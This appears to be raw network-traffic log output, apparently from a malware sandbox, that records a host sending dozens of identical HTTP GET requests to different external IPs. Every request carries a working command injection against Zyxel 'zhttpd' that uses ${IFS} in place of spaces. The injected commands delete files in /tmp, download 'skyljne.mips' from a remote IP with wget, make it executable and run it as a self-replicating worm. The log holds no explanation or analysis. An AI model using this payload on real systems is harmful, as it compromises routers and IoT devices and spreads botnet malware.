                                    Jan 13, 2024 19:02:27.012471914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2704192.168.2.1346448169.105.157.202443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.012516975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2705192.168.2.1336370204.185.201.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.012602091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2706192.168.2.133511664.141.57.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.012664080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2707192.168.2.1354668170.72.146.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.012725115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2708192.168.2.1340954123.13.104.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.012785912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2709192.168.2.1356092189.57.123.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.012849092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2710192.168.2.13393702.218.250.168443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.012926102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2711192.168.2.133405442.11.169.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.012991905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2712192.168.2.1352414191.25.98.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.013047934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2713192.168.2.1336244182.35.215.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.013113022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2714192.168.2.135238217.214.39.87443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.013180971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2715192.168.2.135780648.84.31.45443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.013233900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2716192.168.2.133435034.186.87.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.013272047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2717192.168.2.134899452.231.114.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.013358116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2718192.168.2.134075683.41.36.23443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.013411999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2719192.168.2.135460681.43.0.190443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.013479948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2720192.168.2.1360766185.185.85.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.013545036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2721192.168.2.1354092173.228.195.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.013611078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2722192.168.2.1345240191.244.185.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.013683081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2723192.168.2.1336394182.130.15.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.013747931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2724192.168.2.1348162160.210.143.162443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.013816118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2725192.168.2.1358878145.16.37.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.013875008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2726192.168.2.1347722210.122.126.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.013952971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2727192.168.2.133853850.44.243.44443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.014050961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2728192.168.2.13398961.128.4.185443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.014082909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2729192.168.2.1348318221.109.74.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.014147043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2730192.168.2.133570689.106.182.239443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.014204979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2731192.168.2.135725876.180.156.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.014256001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2732192.168.2.134462280.176.110.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.014297962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2733192.168.2.1349830110.124.240.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.014370918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2734192.168.2.133459449.23.205.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.014434099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2735192.168.2.1351846119.161.128.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.014486074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2736192.168.2.1355262129.67.37.138443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.014552116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2737192.168.2.135370694.66.6.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.014600992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2738192.168.2.135300220.102.247.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.014672041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2739192.168.2.1348382129.28.139.16443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.014720917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2740192.168.2.1334888109.217.41.63443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.014812946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2741192.168.2.1349366213.117.251.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.014856100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2742192.168.2.134859257.44.4.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.014918089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2743192.168.2.1357096107.108.208.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.014976025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2744192.168.2.136063682.48.180.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.015033007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2745192.168.2.1353238186.193.96.59443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.015065908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2746192.168.2.13476029.167.203.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.015129089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2747192.168.2.1349738197.170.8.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.015183926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2748192.168.2.1339868145.8.32.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.015233994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2749192.168.2.1351268101.82.158.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.015299082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2750192.168.2.134892836.80.6.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.015372038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2751192.168.2.1352122115.17.111.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.015397072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2752192.168.2.134943824.69.202.229443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.015443087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2753192.168.2.1359074220.133.212.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.015491962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2754192.168.2.1357222219.51.239.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.015541077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2755192.168.2.1347170205.171.191.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.015620947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2756192.168.2.1347342193.26.1.206443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.015757084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2757192.168.2.135467073.244.89.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.015803099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2758192.168.2.1336698189.134.207.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.015902042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2759192.168.2.135263831.97.141.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.015963078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2760192.168.2.1351126162.68.143.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.016016006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2761192.168.2.134935035.80.223.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.016073942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2762192.168.2.133906212.14.96.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.016122103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2763192.168.2.1344070123.96.196.68443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.016195059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2764192.168.2.134417291.42.198.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.016254902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2765192.168.2.135158623.243.230.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.016330004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2766192.168.2.1349326163.118.79.21443
                                    TimestampBytes transferredDirectionData
